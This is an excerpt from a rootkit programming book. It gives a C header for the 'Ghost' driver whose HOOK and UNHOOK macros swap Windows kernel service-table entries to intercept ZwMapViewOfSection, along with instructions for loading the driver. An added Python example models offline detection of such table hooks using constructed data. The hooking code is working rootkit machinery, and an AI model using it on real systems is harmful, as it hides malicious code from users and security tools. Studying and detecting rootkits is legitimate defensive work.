Professional Rootkits (Programmer to Programmer)
The file hookManager.h first defines the ServiceDescriptorEntry structure. This is the structure for the KeServiceDescriptorTable, which must be imported from the kernel. The structure is packed (#pragma pack(1)) so that it matches the actual layout in memory. The three externals, NewSystemCallTable, pMyMDL, and OldZwMapViewOfSection, are global variables defined in Ghost.c. The three macros, HOOK_INDEX, HOOK, and UNHOOK, are defined to make hooking safe and easy: HOOK_INDEX reads the system call index out of the Zw* stub, and HOOK and UNHOOK swap table entries atomically with InterlockedExchange. Finally, NewZwMapViewOfSection and Hook are the declarations for the functions implemented in hookManager.c:
// Copyright Ric Vieler, 2006
// Support header for hookManager.c

#ifndef _HOOK_MANAGER_H_
#define _HOOK_MANAGER_H_

// The kernel's Service Descriptor Table
#pragma pack(1)
typedef struct ServiceDescriptorEntry {
    unsigned int *ServiceTableBase;
    unsigned int *ServiceCounterTableBase;
    unsigned int NumberOfServices;
    unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()

__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;

// Our System Call Table
extern PVOID* NewSystemCallTable;

// Our Memory Descriptor List
extern PMDL pMyMDL;

// Read the SSDT index from the 'mov eax, imm32' at the start of a Zw* stub
#define HOOK_INDEX(function2hook) *(PULONG)((PUCHAR)function2hook+1)

#define HOOK(functionName, newPointer2Function, oldPointer2Function ) \
    oldPointer2Function = (PVOID) InterlockedExchange( (PLONG) \
        &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) newPointer2Function)

#define UNHOOK(functionName, oldPointer2Function) \
    InterlockedExchange( (PLONG) \
        &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) oldPointer2Function)

typedef NTSTATUS (*ZWMAPVIEWOFSECTION)(
    IN HANDLE SectionHandle,
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,
    IN ULONG ZeroBits,
    IN ULONG CommitSize,
    IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
    IN OUT PSIZE_T ViewSize,
    IN SECTION_INHERIT InheritDisposition,
    IN ULONG AllocationType,
    IN ULONG Protect );

extern ZWMAPVIEWOFSECTION OldZwMapViewOfSection;

NTSTATUS NewZwMapViewOfSection(
    IN HANDLE SectionHandle,
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,
    IN ULONG ZeroBits,
    IN ULONG CommitSize,
    IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
    IN OUT PSIZE_T ViewSize,
    IN SECTION_INHERIT InheritDisposition,
    IN ULONG AllocationType,
    IN ULONG Protect );

NTSTATUS Hook();

#endif
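The HOOK_INDEX macro above works because, on 32-bit Windows, every Zw* stub begins with mov eax, imm32 and that immediate is the index into the service table. The same fact is what an anti-rootkit scanner relies on to detect a swapped entry: decode the index from the stub, then check whether the live table entry still points into the kernel image and still matches a trusted copy. The following Python is an added example, not code from the book or from the Ghost driver, and it models those two detection checks offline. The kernel address range, the 0x80-entry table and the stub bytes are all constructed sample data; on a real system they would come from the loaded ntoskrnl image and a memory read of KeServiceDescriptorTable.

```python
import struct

# Constructed kernel image range for this example (not real addresses).
KERNEL_BASE = 0x80400000
KERNEL_SIZE = 0x00200000  # 2 MiB


def hook_index(stub: bytes) -> int:
    """Equivalent of the HOOK_INDEX macro: read the 32-bit immediate that
    follows the first byte of a Zw* stub.  On 32-bit Windows each Zw*/Nt*
    export starts with 'mov eax, imm32' (opcode 0xB8); the immediate is the
    index into the system service table."""
    if len(stub) < 5 or stub[0] != 0xB8:
        raise ValueError("not a 'mov eax, imm32' stub; refusing to guess an index")
    return struct.unpack_from("<I", stub, 1)[0]


def entries_outside_kernel(table, base=KERNEL_BASE, size=KERNEL_SIZE):
    """Return [(index, address)] for every dispatch pointer that does not lie
    inside the kernel image.  A legitimate entry points into ntoskrnl; a
    pointer into some other module is the classic sign of an SSDT hook."""
    return [(i, p) for i, p in enumerate(table) if not (base <= p < base + size)]


def diff_tables(baseline, live):
    """Compare a trusted copy of the table (for example one rebuilt from the
    on-disk kernel image) against the live table and report every index whose
    pointer changed, as (index, baseline_ptr, live_ptr)."""
    if len(baseline) != len(live):
        raise ValueError("table length mismatch")
    return [(i, b, l) for i, (b, l) in enumerate(zip(baseline, live)) if b != l]


# --- constructed sample data --------------------------------------------
# A made-up ZwMapViewOfSection stub: mov eax, 0x6C ; lea edx, [esp+4]
ZW_STUB = bytes.fromhex("b86c000000" "8d542404")

# A 0x80-entry table standing in for the real one; every entry points into
# the constructed kernel range.
TABLE_SIZE = 0x80
BASELINE = [KERNEL_BASE + 0x1000 + 0x40 * i for i in range(TABLE_SIZE)]

# The live table is identical except that the ZwMapViewOfSection slot has
# been swapped to point into a third-party driver (constructed address).
LIVE = list(BASELINE)
LIVE[hook_index(ZW_STUB)] = 0xF8A01234


if __name__ == "__main__":
    idx = hook_index(ZW_STUB)
    print("HOOK_INDEX(ZwMapViewOfSection) ->", hex(idx))
    print("entries outside kernel image:", [(i, hex(p)) for i, p in entries_outside_kernel(LIVE)])
    print("entries differing from baseline:", [(i, hex(b), hex(l)) for i, b, l in diff_tables(BASELINE, LIVE)])
```

The two checks are complementary: the range check needs no prior state but misses a hook that redirects to a code cave inside the kernel image, while the baseline comparison catches any change but depends on having captured a trusted copy of the table first.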
Once compiled and loaded using the Checked DDK icon and SCMLoader.exe from Chapters 1 and 2, you should be able to start the service using “net start MyDeviceDriver” and see the debug statement “comint32: NewZwMapViewOfSection” called whenever a new application is loaded.